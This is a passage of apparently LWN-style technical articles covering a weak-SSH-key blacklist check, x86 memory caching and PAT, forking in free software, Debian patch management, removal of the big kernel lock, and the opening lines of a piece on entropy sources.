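                return None
            return hashlib.sha256(blob).hexdigest()
    return None


def find_weak_keys(authorized_keys_text: str, blacklist: set) -> list:
    """List (line number, digest) for every key whose digest is blacklisted."""
    weak = []
    for lineno, line in enumerate(authorized_keys_text.splitlines(), start=1):
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest = key_fingerprint(line)
        if digest is not None and digest in blacklist:
            weak.append((lineno, digest))
    return weak
```

A clean result from a check like this only means that no key matched the list at hand; as the dowkd description above warns, such lists may be incomplete.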


		Getting a handle on caching


Memory management changes (for the x86 architecture) have caused surprises
for a few kernel developers.  As these issues have been worked out, it has
become clear that not everybody understands how memory caching works on
contemporary systems.  In an attempt to bring some clarity, Arjan van de
Ven wrote up some notes and sent them to your editor, who has now worked
them into this article.  Thanks to Arjan for putting this information
together - all the useful stuff found below came from him.


As readers of What every
programmer should know about memory will have learned, the caching
mechanisms used by contemporary processors are crucial to the performance
of the system.  Memory is slow; without caching, systems will run
much slower.  There are situations where caching is detrimental,
though, so the hardware must provide mechanisms which allow for control
over caching with specific ranges of memory.  With 2.6.26, Linux is
(rather belatedly) starting to catch up with the current state of the art
on x86 hardware; that, in turn, is bringing some changes to how caching is
managed.


It is good to start with a definition of the terms being used.  If a piece
of memory is cachable, that means:


 The processor is allowed to read that memory into its cache at 
     any time.  It may choose to do so regardless of whether the
     currently-executing program is interested in reading that memory.
     Reads of cachable memory can happen in response to speculative
     execution, explicit prefetching, or a number of other reasons.  The
     CPU can then hold the contents of this memory in its cache for an
     arbitrary period of time, subject only to an explicit request to
     release the cache line from elsewhere in the system.

 The CPU is allowed to write the contents of its cache back to memory
     at any time, again regardless of what any running program might choose
     to do.  Memory which has never been changed by the program might be
     rewritten, or writes done by a program may be held in the cache for an
     arbitrary period of time.  The CPU need not have read an entire cache
     line before writing that line back.


What this all means is that, if the processor sees a memory range as
cachable, it must be possible to (almost) entirely disconnect the
operations on the underlying device from what the program thinks it is
doing.  Cachable memory must always be readable without side effects.
Writes have to be idempotent (writing the same value to the same location
several times has the same effect as writing it once),
ordering-independent, and size-independent.  There must be no side effects
from writing back a value which was read from the same location.  In
practice, this means that what sits behind a cachable address range must be
normal memory - though there are some other cases.


If, instead, an address range is uncachable, every read and write
operation generated by software will go directly to the underlying device,
bypassing the CPU's caches.  The one exception is with writes to I/O memory
on a PCI bus; in this case, the PCI hardware is allowed to buffer and
combine write operations.  Writes are not reordered with reads, though,
which is why a read from I/O memory is often used in drivers for PCI
devices as a sort of write barrier.


A variant form of uncached access is write combining.  For read
operations, write-combined memory is the same as uncachable memory.  The
hardware is, however, allowed to buffer consecutive write operations and
execute them as a smaller series of larger I/O operations.  The main user
of this mode is video memory, which often sees sequential writes and which
offers significant performance improvements when those writes are
combined. 
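
The effect of write combining can be modeled in a few lines.  The sketch below is a software simulation only; the function name and the 64-byte burst limit are assumptions for illustration, not a description of any particular processor's write-combining buffers.

```python
def combine_writes(writes, max_burst=64):
    """Merge address-consecutive writes into larger bursts.

    `writes` is an iterable of (address, bytes) pairs in program order.
    Returns a list of (address, bytes) bursts of at most `max_burst` bytes.
    """
    bursts = []
    cur_addr, cur_data = None, bytearray()
    for addr, data in writes:
        contiguous = cur_addr is not None and addr == cur_addr + len(cur_data)
        if contiguous and len(cur_data) + len(data) <= max_burst:
            # Extends the pending burst: just grow the buffer.
            cur_data += data
        else:
            # Not adjacent (or buffer full): flush and start a new burst.
            if cur_addr is not None:
                bursts.append((cur_addr, bytes(cur_data)))
            cur_addr, cur_data = addr, bytearray(data)
    if cur_addr is not None:
        bursts.append((cur_addr, bytes(cur_data)))
    return bursts
```

Sixteen sequential four-byte writes, as might be seen when filling a scanline in video memory, collapse into a single 64-byte operation in this model, while scattered writes pass through unchanged.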


The important thing is to use the right cache mode for each memory range.
Failure to make ordinary memory cachable can lead to terrible performance.
Enabling caching on I/O memory can cause strange hardware behavior and
corrupted data, and is probably implicated in global warming.  So the CPU
and the hardware behind a given address must agree on caching.


Traditionally, caching has been controlled with a CPU feature called
"memory type range registers," or MTRRs.  Each processor has a finite set
of MTRRs, each of which controls a range of the physical address space.
The BIOS sets up at least some of the MTRRs before booting the operating
system; some others may be available for tweaking later on.  But MTRRs are
somewhat inflexible, subject to the BIOS not being buggy, and are limited
in number.


In more recent times, CPU vendors have added a concept known as "page
attribute tables," or PAT.  PAT, essentially, is a set of bits stored in
the page table entries which control how the CPU does caching for each
page.  The PAT bits are more flexible and, since they live in the page
table entries, they are difficult to run out of.  They are also completely
under the control of the operating system instead of the BIOS.  The only
problem is that Linux has not, until now, supported PAT on the x86
architecture, despite the fact that the hardware has had this capability
for some years.


The lack of PAT support is due to a few things, not the least of which has
been problematic support on the hardware side.  Processors have stabilized
over the years, though, to the point that it is possible to create a
reasonable whitelist of CPU families known to actually work with PAT.
There have also been challenges on the kernel side; when multiple page
table entries refer to the same physical page (a common occurrence), all of
the page table entries must use the same caching mode.  Even a brief window
with inconsistent caching can be enough to bring down the system.  But the
code on the kernel side has finally been worked into shape; as a
result, PAT support was merged for the 2.6.26 kernel.  Your editor is
typing this on a PAT-enabled system with no ill effects - so far.


On most systems, the BIOS will set MTRRs so that regular memory is cachable
and I/O memory is not.  The processor can then complicate the situation
with the PAT bits.  In general, when there is a conflict between the MTRR
and PAT settings, the setting with the lower level of caching prevails.
The one exception appears to be when one says "uncachable" and the other
enables write combining; in that case, write combining will be used.  So
the CPU, through the management of the PAT bits, can make a couple of
effective changes:


 Uncached memory can have write combining turned on.  As noted above,
     this mode is most useful for video memory.

 Normal memory can be made uncached.  This mode can also be useful for
     video memory; in this case, though, the memory involved is normal RAM
     which is also accessed by the video card.
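
The conflict rule described above can be written down as a small function.  This encodes only the simplified rule as stated in this article, with mode names chosen for the sketch; the processor manuals define a more detailed table, which is not reproduced here.

```python
# Ordered from least to most caching, following the simplified rule in the text.
CACHING_LEVEL = {"uncachable": 0, "write-combining": 1, "writeback": 2}


def effective_mode(mtrr: str, pat: str) -> str:
    """Combine an MTRR setting and a PAT setting into one effective mode."""
    # The one exception: uncachable plus write combining gives write combining.
    if {mtrr, pat} == {"uncachable", "write-combining"}:
        return "write-combining"
    # Otherwise the setting with the lower level of caching prevails.
    return min(mtrr, pat, key=CACHING_LEVEL.__getitem__)
```

So effective_mode("uncachable", "write-combining") models the first case in the list (video memory behind an uncached MTRR), and effective_mode("writeback", "uncachable") models the second (ordinary RAM made uncached through the page tables).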


Linux device drivers must map I/O memory before accessing it; the function
which performs this task is ioremap().  Traditionally,
ioremap() made no specific changes to the cachability of the
remapped range; it just took whatever the BIOS had set up.  In practice,
that meant that I/O memory would be uncachable, which is almost always what
the driver writer wanted.  There is a separate ioremap_nocache()
variant for cases where the author wants to be explicit, but use of that
interface has always been rare.

In 2.6.26, ioremap() was changed to map the memory uncached at all
times.  That created a couple of surprises in cases where, as it happens,
the memory range involved had been cachable before and that was what the
code needed.  As of 2.6.26, such code will break until the call is changed
to use the new ioremap_cache() interface instead.  There is also an
ioremap_wc() function for cases where a write-combined mapping is
needed. 

It is also possible to manipulate the PAT entries for an address range
explicitly:


These functions will set the given pages to uncachable, write-combining, or
writeback (cachable), respectively.  Needless to say, anybody using these
functions should have a firm grasp of exactly what they are doing or
unpleasant results are certain.

		The Freedom of Fork


One of the important rights that Free Software gives you is the ability
to take the source code of any software, modify it, and release it again
under a compatible Free Software license.
It is a very important freedom, as it not only allows users to
customize the software they use to better suit their requirements,
but also enables distributions to patch software to build in their
environment.  Environmental changes include new architectures and
different versions of system tools and libraries.
As with other important freedoms, this ability can prove to be a huge
problem if not handled properly.  There can be problems for
the original author, the person doing the fork, and the users of the
various versions of the software.


The story of Free Software is full of good examples of forks handled correctly,
like the EGCS
fork that transformed the GNU C Compiler into the 
GNU Compiler Collection (GCC),
or more recently the replacement of
Jörg Schilling's
cdrtools
with the cdrkit
package that is now found in most distributions.
Unfortunately, the list of bad examples is longer.


Historically, forking a project was a difficult task for most single developers: handling version control repositories (especially with CVS)
was not something done easily.  It limited the task of forking to
experienced developers, who usually had enough common sense to know
when forking was not an option.


Nowadays, forking is much easier:
Subversion
allows developers to easily fetch the whole history of a project.
Distributed version control systems (DVCS) like git, Mercurial,
Bazaar-NG and others remove the need for a central repository, making
forking and branching two very similar activities.
Recently, the GitHub hosting site
has made this action even more prominent by adding a "fork" button on the
pages for the repositories hosted on its servers, allowing anybody to
create a new branch (or fork) of a project with a single mouse click.

The Downsides of Forking

Forking is not always the best option. It should probably be considered
the last resort. Forking divides efforts
as the two projects often take slightly different turns.
The result of the fork is that the two versions of the code diverge, even
though they share the same interface and most
of the background logic.
This creates a series of problems of a technical nature that reflect
on the non-technical attributes of a program.


A forked project reuses a big part of the code from the original
project.  This causes code duplication, with its usual problems, and one
in particular: security risks. A forked project is usually
vulnerable to the problems the original project had, unless that part
of the code has been rewritten or modified with time.
As the forks evolve, authors often miss the security issues fixed by
their ancestor, making it harder for developers to track the issues down.


Another common problem is the division of users' contributions.
Users usually just report issues to one project, the one they use.
So either the developers of the two projects exchange information about
the bugs they fix in the common code, or the problems will likely be
ignored by one of the two projects, making the distance between the
projects increase.


You can find this very problem with software like
Ghostscript, the
omnipresent PostScript processor, used to generate, view and convert
PostScript files. Its development is currently divided into multiple
forks which do not always give their code back to the originating
project.
You can find one version released under the AFPL (Aladdin Free Public
License), one released under the GPL, a commercial/proprietary one,
and one version that used to be developed by Easy Software
Products, the authors of the CUPS printing system.


The reasons for the forks here were mostly related to licensing issues.
And, in the case of ESP, to better support CUPS.
In the end, the development of different bloodlines for the project
caused, and still causes, problems for distribution maintainers.
Distribution issues include keeping packages aligned, which means
doubling the effort needed to fix the code if it breaks or if it
doesn't follow policy.


Another case where dividing the development effort has caused problems
is in the universe of Logitech mouse control software.
The
lmctl
project was started as a tool to control some
settings of Logitech devices, like resolution and cordless channels.
The code has to know which devices have which settings available.
To do this, it keeps a table of USB identifiers.  As new devices started
appearing on the market, and Linux users started using them, the table
became outdated.
Distributions patched this up, but in different ways, creating
inconsistent tables. Some users started releasing their own modified
version of lmctl with an extended table to support different devices.


While explicit forks of entire projects have problems, the fact that
they delineate where they took the code from makes it easier to track
down the source of bugs and handle security vulnerabilities. On the
other hand, when a project borrows some code and imports it in its
source distribution, this kind of tracking becomes more difficult.
Free Software licenses explicitly allow, and push for, importing code
between projects; cross-pollination also improves general code quality
over time.


For most distributions, an internal imported copy of a library inside
another project is also a violation of policy. For this reason the
developers will most likely try to make the project use a shared, external
copy of the code.
This works fine when the other library is simply bundled together
untouched, but it becomes a nuisance if there are subtle changes
which might not be apparent at a first impression.
One thing to take into account when you want to have an internal copy of
a library is to consider it as an untouchable piece of code.
Instead of spending time fixing bugs inside that copy of the code, the
developers should try to fix the bugs in the original sources, so that
everybody (including themselves) can make use of the improvement.


In the real world, one example of this can be the
FFmpeg source code.
FFmpeg is imported by many different Free Software projects in the area
of multimedia: xine, MPlayer, GStreamer. While it is a very wide common
ground for all these projects, as well as for some others that aren't
importing a copy of it like VLC, some of the imports change the source
code, in more or less subtle ways. In the case of xine, the whole build
system is replaced to integrate it with the automake-based build system
used by the rest of the library.  Further patching is done to the
sources themselves so that they behave in a slightly different way than
the original. The code rots quickly and bugs that were already
fixed in the in-development sources of FFmpeg still sprout in xine-lib.


Maintaining such an import is a difficult and boring task, to the point
that the developers, in the past two years, have spent a lot of energy
toward the goal of not using an internal copy of FFmpeg anymore.
The result is that the difference between the original FFmpeg and the
internal copy is now much smaller, mostly limited to the build system.
Instead of advising against using an external copy of FFmpeg, the project
now advises against using the internal one. For the next minor version of
xine-lib, FFmpeg is being used pristine, entirely unpatched, and it will
probably not even be bundled with the library in the near future.

Successful Forks

Of course it's not all bad. There are successful forks in Free Software,
and many of them are now more famous than their parents. I've already named
the GNU Compiler Collection, which is the GCC that almost all Free Software
users have at hand at the moment.  Most people use GCC version 3
and later, which started as a fork of the other GCC (the GNU C Compiler), version 2. The original development of GCC was, like many other GNU projects, very closed to the community.


As Eric S. Raymond defined it in his book The Cathedral and the
Bazaar, it was Cathedral-style development, which often prepares the
ground for forks, and this was no exception.  Multiple forks of the GCC
code were created. Their goals, while different, often didn't clash, and
could easily have been worked on at the same time. Some of the forks were
then merged into the EGCS project, which eventually replaced the original
GCC.


Again citing GNU's Cathedral style of development, it's difficult not to
talk about GNU Emacs
and its brother XEmacs.
Created originally to
support one particular product, the XEmacs project is nowadays a mostly
standalone project. XEmacs is kept at an arm's length from GNU Emacs,
mostly because of licensing and copyright assignment issues.
Neither version can be considered a superset of the other because they
both implement features in their own way.


Better is the state of
Claws Mail,
started as a different
branch of Sylpheed,
with the name Sylpheed Claws.  Originally the intention was
to develop new features that could one day find their way back to the
original code.  Claws Mail has since declared itself independent and
is now a stand-alone project. In this case, the exchange of code between the two projects has basically halted, as the code bases have diverged so
much that they retain very little in common.


In the case of the Ultima Online server emulators, forks became daily
events, and cross-pollination had grown to the point where at least five
projects were linked by family ties.
The UOX3 source code has been
forked, reused, imported and cut down so that it is present in WolfPack,
LoneWolf, NoX-Wizard and Hypnos.
Almost all of the UOX3 forks involved re-writing parts of the code,
as it had stratified to the point of not being maintainable.
The forks continued copying one from the other to make use of the best
features available.

Forking vs. Branching

There are a few good reasons why you might want to detach, temporarily,
from a given development track: development of experimental features, new
interfaces, backend rewrites, or resurrection of a project whose original
authors are unavailable.
In most of these cases, forking is not the best solution but
branching most likely is. Although the border between these two
actions has started to blur thanks to distributed VCS, branching
usually doesn't involve setting up a new web page for the project,
changing its name or finding a new goal. And a branch is usually
related, tightly or not, to the original project.  Merges between
the two code bases often happen at more or less regular intervals,
and ideas and bug reports are shared.


Branches usually have the target of being merged in the main
development track, sooner for small, testing branches, or later for huge
rewrites. They don't usually require dividing of the efforts as the
problems affecting the main branch get their fixes propagated to the
other branches when they merge back the original code.


One common problem with developing through branches involved bad support
in the Subversion version control system. In Subversion the branches are
represented as a different path in the repository, with almost no help
for branches in the merge operations.
With a modern distributed VCS, branches are so cheap that
any checkout is, from some points of view, a different branch, and the
merge operations are one of the main focuses.
Projects like the Linux kernel or xine-lib rely heavily on an
above-average number of branches.  These are often short-lived and
used for testing purposes.

Looking to the Future

Forks will never end in Free Software as they are supported by one of
the freedoms that make Free Software what we all want it to be.
The future will, of course, bring new forks.
Recently there has been a lot of talk about
Funpidgin,
a fork of the widespread Pidgin Instant Messaging client (formerly Gaim).
Again it seems like it was the Cathedral-style development of the original
code that motivated a fork that could give (some of) the users what
they wanted.


And even though GNU Emacs opened its process quite a lot, its forks
haven't stopped sprouting.  This is despite the fact that
Richard Stallman, original author and mastermind behind the GNU project,
stepped down as maintainer, putting in place Stefan Monnier and Chong Yidong.
The Aquamacs Emacs is still diverging from the original GNU
Emacs for supporting Apple's Mac OS X, while different versions
are being developed to support the multiple user interfaces one can use
on that operating system. Similarly, although the Windows port of Emacs
is already pretty solid, there are extensions being written to make it
easier for users to adapt it to the Microsoft environment.


Forks are usually the effect of a closed-circle development, a Cathedral,
where some of the developers or users can't see their objective being
fulfilled despite all the energy they pour in. So just look for the
projects that don't seem to be getting much love from a community, and
you might find a fork starting to make its first leaves.


Then there is the
Poppler project,
which merged together the modified versions of the XPDF code imported by
projects like GNOME and KDE for their PDF viewers.
Poppler is soon going to be a nearly omnipresent PDF viewer on Free
Software desktops and beyond.
This summer's milestone KDE 4.1 release will include the release of
the new oKular document viewer; oKular will use Poppler for PDF rendering
on the (stable) KDE users' desktops.

Conclusions

I'd suggest that anybody thinking about creating a fork should think
twice. Forking is rarely a good choice; better choices can be
branching or, if you need just part of the code, working together as the
Poppler developers did to separate out and share the common parts.


When you want to make some changes to a software project, propose
branching it, show the results to the original developers and discuss
with them on how to improve the code. Most of the time you'll find
authors are open to the changes.


A fork is a grave matter.  It might bring innovation to the Free Software
community, but it could also separate developers that could otherwise
work together, maybe in a better way.  In this light, GitHub's one-click
forking capability seems like a dangerous feature.


The ever-increasing ease of forking everything, from small projects
to part of, or even entire distributions (think about Debian's
repositories and Gentoo's overlays) is increasing the fragmentation of
Free Software projects.  Biodiversity in software can be a very good
thing, just like in nature, but people should first try their best to
work together, rather than one against the other.


		Debian contemplates patch management


Developers in the Debian project had a busy week cleaning up after the
openssl vulnerability was disclosed.  Once that was taken care of, they
moved on to process-related issues.  Clearly, some shortcomings in how
Debian handles patches to the programs it ships have been revealed; now the
project would like to face those problems and make things work better in
the future.  The resulting discussion shows Debian at its introspective
best, and may well have results that other distributors will want to pay
attention to.  As a Fedora developer noted:
"This bug could easily have been us on the receiving end."
All distributors make changes to their packages, so all of them are
potentially exposed to this kind of failure.


Debian's packaging policy resembles that of most other distributions.  A
Debian source package is supposed to contain a tarball of the upstream
source distribution, without changes.  Any distribution-specific patches
are included separately and applied when the source package is prepared for
building.  There are a couple of Debian-specific issues to be faced, though:


 From the discussion, it seems that the "pristine upstream
     tarball" rule is occasionally bent by developers.  Sometimes there is
     no alternative: some upstream source distributions contain material
     which, due to its licensing, cannot be shipped by Debian.  The
     justification for other cases is not always quite as clear.

 Debian's patches are all mashed together and included as a single diff
     file.  So there is no metadata describing the patches, and they are
     difficult to separate from each other.  In this regard, Debian differs
     from RPM-based distributions, which generally keep each patch separate.


The end result of all this is that Debian's patches are hard for others to
review, hard for upstream projects to consider, and even hard for other
Debian developers to get a handle on.

Raphaël Hertzog started a discussion
on how to improve this situation.  A key part of his approach (and an idea
which others have been pursuing as well) is to make changes to the Debian
source package format which would make the nature of each patch explicit.
At a minimum, packagers would include a debian/patches directory
with the source; that directory would contain each patch, broken out into a
separate file.  Some Debian packages are built this way already, though the
practice is far from universal.

Beyond that, though, it would be nice to have the source package itself
understand the patch stream and its associated metadata.  There are a few
proposals for this; Raphaël favors the "3.0 (quilt)" format, which
keeps the patches (in a separate tarball) as a quilt series.  This format
seems to have a certain amount of support; among other things, its
simplicity would make it easy for Debian developers to create packages in
this format without having to learn new tools.  The quilt series file -
like the spec file used with RPM packages - makes it clear which patches
must be applied, and in which order.
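
As a rough illustration of how a series file makes the patch order explicit,
here is a minimal Python sketch that reads one.  It assumes the usual quilt
conventions (one patch per line, "#" starting a comment, optional patch
options such as -p1 after the file name); the function name and the patch
names are invented for the example and do not come from any Debian package.

```python
def parse_series(text):
    """Return (patch_name, options) pairs in the order they must be applied."""
    patches = []
    for line in text.splitlines():
        # Assumption: everything after '#' is a comment; blank lines are ignored.
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        name, *options = line.split()
        patches.append((name, options))
    return patches


# Hypothetical debian/patches/series content; the file names are made up.
EXAMPLE_SERIES = """\
# fixes that should also go upstream
01-fix-manpage-typo.patch
02-remove-nonfree-docs.patch -p1
"""

if __name__ == "__main__":
    for name, options in parse_series(EXAMPLE_SERIES):
        print(name, options)
```

A reviewer (or a patch-tracking site) needs nothing more than this list to
know which changes exist and in which order they land on the upstream source.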


There are other variants of the 3.0 source package format, though.  The
"3.0 (git)" format contains a git repository containing the
upstream source and a series of patches to it.  This approach has the
advantage of including the history of the patches along with the other
metadata; it could also, arguably, make it easier for other distributors
(and upstream) to cherry-pick patches of interest.  On the other hand, a
git-based package format requires the availability of git and has the
potential to make those packages larger.  The GitSrc FAQ has some more
information on this format; there's also a "3.0 (bzr)" format
variant out there.


Any of these new formats, if widely adopted, would bring a new level of
transparency to Debian's patching activities.  It would enable the creation
of a "patches.debian.org" site (clearly inspired by patches.ubuntu.com) where anybody
could quickly look at the changes which have been made to any given
package.  There are some developers who doubt the utility of this; they
worry that upstream developers won't want to poll a site to see what
changes have been made to their code.  One developer at least (GNOME hacker
Vincent Untz) thinks that a
patches.debian.org site would be a step in the right direction, though.


Another quibble which has been heard is that Debian does not need any new
infrastructure for patch management.  The right place for patch tracking,
it is said, is with the upstream project.  Nobody seems to challenge the
claim that more patches need to go back upstream, but there is also the
fact that quite a few patches will never get there.  The upstream
developers for a number of projects seem to have different goals and are
seen by the distribution maintainers as being overtly uncooperative.  And
some patches - such as those removing non-free material - may not be
something that even cooperative upstream maintainers want.  So there will
always be a need for distribution-specific patches; the "track it upstream"
approach will not solve the whole problem.


Meanwhile, Joey Hess brought a completely different
idea to the discussion: just treat every divergence from upstream as a
bug.  Each patch would have a corresponding entry in the Debian bug
tracking system (BTS) with a special tag.  Anybody could then query the
list of outstanding bugs, view the patches, and participate in the
associated discussion.  Using the BTS brings some real technical
advantages, in that the system already exists.  But, Joey says, the real benefit is elsewhere:


	The biggest reason for using the BTS is not technical. It's that,
	if we decide that the project will treat divergence from upstream
	as a bug, then we've effectively decided that maintainers will be
	responsible for both minimising unnecessary divergence,
	communicating about it to upstream, and for keeping track of what
	divergence exists. Because developers are responsible for their
	bugs.


A separate patch tracking mechanism, instead, would be a mostly automatic
subsystem on the side which might not bring the same sort of pressure to
bear on developers.

The BTS approach is not universally acclaimed either.  Some developers
claim that most Debian-specific patches are not really Debian bugs - they
are, instead, upstream bugs.  Regardless of whether that is really true,
distribution bug trackers generally carry a great many entries which, in
the end, describe bugs in upstream packages.  Another complaint is that
creating and maintaining BTS entries would be just another bit of
bureaucratic work imposed on Debian developers.  Beyond any doubt, some
developers would see it that way.


But this may be a place where a bit more bureaucracy makes some sense.  The
Linux distributors of the world (certainly not just Debian) are carrying
thousands of patches against the free programs they distribute.  Making the
nature and extent of those patches more readily apparent can only be
beneficial for users, reviewers, distributors, and upstream maintainers.  
One clear conclusion from recent events is that all distributors could do
more to let the rest of the community know about the changes they are making.


A distributor's ability to patch a program is a crucial part of the whole
ecosystem - it's the distributors' way of balancing their users' needs
against the upstream maintainer's policies.  But distributors should be
clear about the changes they are making, willing to merge those changes
upstream whenever possible, and wanting feedback on those patches.  Any
"bureaucracy" which helps to make that happen can only help our community
as a whole in ways that go far beyond the avoidance of another openssl
disaster.


One final note: the existence of source package formats which incorporate
distributed version control system repositories shows that developers have
been thinking about this problem for a while; it's not just a response to
recent events.  There is an effort underway to think about what the
intersection of version control and packaging can really achieve for all
distributors; the folks working on this project can be found at vcs-pkg.org.  They are working on organizing
a gathering this
September in Extremadura.  Vcs-pkg is worth watching; it has the
potential to make things work better for developers and users of all
distributions.

		Kill BKL Vol. 2


Last week's big kernel lock
article discussed a BKL-related performance regression and concluded
that we would likely see a new interest in its elimination.  In the
intervening week, that interest has indeed come to the fore.  There are now
a couple of different efforts afoot to get rid of this long-lasting lock.


One might well wonder why the BKL is so persistent.  Over the last
(approximately) fifteen years, thousands of locks have been added to the
kernel, pushing the BKL into increasingly obscure corners.  But there are a
lot of those corners, including a great many explicit
lock_kernel() calls, the open() method for every char
device, most ioctl() implementations, all fasync()
implementations, and more.  The BKL can be found throughout the kernel, and
doesn't appear ready to go without a fight.


Part of the problem is simply that locking is hard.  So going in and
changing the locking of some crufty, old driver is not at the top of the
list for a lot of developers, who would generally rather be creating crufty
new drivers.  Beyond that, though, the BKL is special.  It was originally
created to be more than just a locking primitive; its purpose is to allow
BKL-covered code to pretend that it is still running on an old,
uniprocessor system.  So its semantics are very different from any other
lock in the Linux kernel.  

For example, the BKL nests, so programmers can add lock_kernel()
calls anywhere without worrying about whether the BKL might already have
been acquired elsewhere.  As with a mutex, code holding the BKL can sleep;
however, the scheduler will magically release the BKL until the holding
thread wakes up again.  So there can be various threads in kernel space,
all of which think they hold the BKL, but only one of them will actually be
running at any given time.  The end result is that it is hard to get a
handle on what is happening with the BKL at any given time; code can depend
on it without ever really being aware of its existence.
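
Those two properties (nesting, and being dropped across a sleep) can be
modeled in user space.  The following Python sketch is only a toy: the class
and method names are invented here, threads stand in for kernel tasks, and
nothing about it reflects how the kernel actually implements the BKL.

```python
import threading


class ToyBKL:
    """User-space model of a lock that nests and is dropped while sleeping."""

    def __init__(self):
        self._lock = threading.Lock()
        self._owner = None   # thread id of the current holder, if any
        self._depth = 0      # how many times the holder has taken the lock

    def lock_kernel(self):
        me = threading.get_ident()
        if self._owner == me:
            self._depth += 1          # nested acquisition: just count it
            return
        self._lock.acquire()
        self._owner = me
        self._depth = 1

    def unlock_kernel(self):
        assert self._owner == threading.get_ident()
        self._depth -= 1
        if self._depth == 0:
            self._owner = None
            self._lock.release()

    def sleep_holding(self, wait_fn):
        """Model a sleep: drop the lock entirely, block, then restore the depth."""
        saved = self._depth
        self._owner = None
        self._depth = 0
        self._lock.release()
        try:
            wait_fn()
        finally:
            self._lock.acquire()
            self._owner = threading.get_ident()
            self._depth = saved


def demo():
    bkl = ToyBKL()
    seen = []

    def other():
        bkl.lock_kernel()
        seen.append("other thread ran while the first one slept")
        bkl.unlock_kernel()

    def wait():
        t = threading.Thread(target=other)
        t.start()
        t.join()

    bkl.lock_kernel()
    bkl.lock_kernel()            # nesting is harmless
    bkl.sleep_holding(wait)      # "other" gets the lock during the sleep
    depth_after = bkl._depth
    bkl.unlock_kernel()
    bkl.unlock_kernel()
    return seen, depth_after
```

The first thread believes it held the lock throughout, yet another thread ran
under the same lock in the middle; that is the kind of invisible dependency
the text describes.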

As Ingo Molnar put it in his kill
the BKL tree announcement:


	Furthermore, the BKL is not covered by lockdep, so its dependencies
	are largely unknown and invisible, and it is all lost in the haze
	of the past ~15 years of code changes. All this has built up to a
	kind of Fear, Uncertainty and Doubt about the BKL: nobody really
	knows it, nobody really dares to touch it and code can break
	silently and subtly if BKL locking is wrong.


That doesn't mean that people aren't willing to try; Ingo's tree - to which
we will return shortly - is a major
effort in that direction.  But first,
consider another initiative which, somewhat accidentally, turned up an
example of just how subtle BKL-related issues can be.  As was mentioned
above, the kernel grabs the BKL whenever a process opens a char device; the
BKL is held while the associated driver's open() function runs.
To eliminate the BKL, one must remove this particular use of it; one cannot
just take it out, however, without breaking every driver which does not
have proper locking internally.  So, in fact, this lock_kernel()
call cannot be removed until every driver's open() function has
been audited and, if necessary, fixed.  That's a big flag day.


An alternative, which your editor rashly jumped into doing, is to push the
acquisition of the BKL down one level.  Every open() function is
forced to be correct through the addition of explicit
lock_kernel() and unlock_kernel() calls; once all of the
in-tree drivers have been fixed in this way, the higher-level call in
chrdev_open() can be removed.  This work may seem like a step
backward, in that it replaces a single lock_kernel() call with
approximately 100 others.  But it's actually a big step forward, in that
each driver can now be audited and fixed independently.  This work has now
been done, the resulting tree is in linux-next, and, if all goes well, it
should be ready for 2.6.27.


While doing this work, though, your editor noticed quite a few drivers with
open functions that either were completely empty (all they do is
"return 0") or did something relatively trivial.  These
functions, one would think, do not need to acquire the BKL; they touch no
global resources and cannot possibly race with any other part of the
kernel.  In fact, as was suggested by others, the empty open()
functions could just be removed altogether.


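It was Alan Cox who pointed out that life
is not quite so simple.  Under the current regime, an open function (call it
empty_open()) whose body does nothing but "return 0" is really better
modeled as one which calls lock_kernel(), immediately calls
unlock_kernel(), and only then returns 0.
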
These two may seem the same, but there is a crucial difference: in the
second form, empty_open() will not return until it can acquire the
BKL.  In other words, after empty_open() runs, one knows that the BKL became available
at least once.  And this matters: a classic device driver error is to
(1) register a device with the kernel, then (2) initialize all of
the internal data structures needed to manage that device.  Should some
other process attempt to open and use the device between those two steps,
unpleasant things can happen.  The lock_kernel() call in the
open() function, despite protecting no critical section directly,
serializes the opening of the device with the driver's initialization, and
thus prevents mayhem.  So, says Alan,


	I think it would be best to make them lock/unlock kernel in the
	first pass and then work through them. The BKL can be subtle and
	evil, but as I brought it into the world I guess I must banish it
	;)
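
The serialization effect described above can be reproduced in a small
user-space simulation.  This Python sketch is not kernel code: a plain mutex
stands in for the BKL, the class and function names are invented, and it
assumes that the driver's initialization runs while holding the lock.

```python
import threading

bkl = threading.Lock()   # stand-in for the BKL (no nesting in this toy)


class ToyDriver:
    def __init__(self):
        self.registered = threading.Event()
        self.finish_init = threading.Event()
        self.initialized = False

    def init(self):
        with bkl:                      # assumption: init runs under the BKL
            self.registered.set()      # (1) the device becomes visible
            self.finish_init.wait()    # window in which an open can arrive
            self.initialized = True    # (2) internal state is set up

    def open(self, take_bkl):
        if take_bkl:
            with bkl:                  # lock_kernel(); unlock_kernel();
                pass
        return self.initialized        # what the opener would find


def race(take_bkl):
    """Open the device between steps (1) and (2); report what the open saw."""
    drv = ToyDriver()
    result = []
    init_thread = threading.Thread(target=drv.init)
    opener = threading.Thread(target=lambda: result.append(drv.open(take_bkl)))
    init_thread.start()
    drv.registered.wait()              # visible, but not yet initialized
    opener.start()
    if not take_bkl:
        opener.join()                  # the open finishes before init does
    drv.finish_init.set()
    init_thread.join()
    opener.join()
    return result[0]
```

Here race(False) returns False (the opener saw an uninitialized device),
while race(True) returns True: the apparently useless lock/unlock pair makes
the open wait until initialization has completed.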


Alan will not be alone in that effort, though, and Ingo Molnar's "kill the
BKL" tree is likely to help this work considerably.  Ingo's approach is to
get rid of most of the features which make the BKL special.  So, with his
patches, the BKL becomes just another mutex which, crucially, can be
tracked with the lock
validator.  It is no longer released when a thread calls
schedule(), a change which forced the addition of a few explicit
"release, schedule, and reacquire" changes in code which would otherwise
deadlock.  There are a number of warnings added to point out calls made
holding the BKL which should not be.  And so on.

This patch set, in essence, removes the BKL entirely, replacing it with
just another big lock which happens to do nesting.  And the nesting might
go too at some point.  So the BKL becomes more visible and easier to
understand.  And, presumably, easier to eliminate.

Linus likes this approach, though he would
like to see it reworked to the point that it can be merged into the
mainline relatively soon.  Doing that would require putting most of the
changes behind a configuration option decorated with a sufficient number of
scary warnings; then people who wanted to test this code could turn it on
and see what explodes.  The number of explosions would probably be
relatively small - but probably not zero.

This set of changes, along with the other work being done, suggests that
significant progress toward the elimination of the BKL can be expected over
the next few kernel development cycles.  Once it's gone, we'll have a
kernel without legacy locking issues, and without the unpleasant
performance issues that the BKL can bring.  That will still take a while,
though; there is simply no substitute for actually looking at all the
BKL-covered code and ensuring that it will run safely in the absence of
that protection.  It's a painstaking job requiring moderate skills which
can only be rushed so much.

		Appropriate sources of entropy


A steady stream of random events allows the kernel to
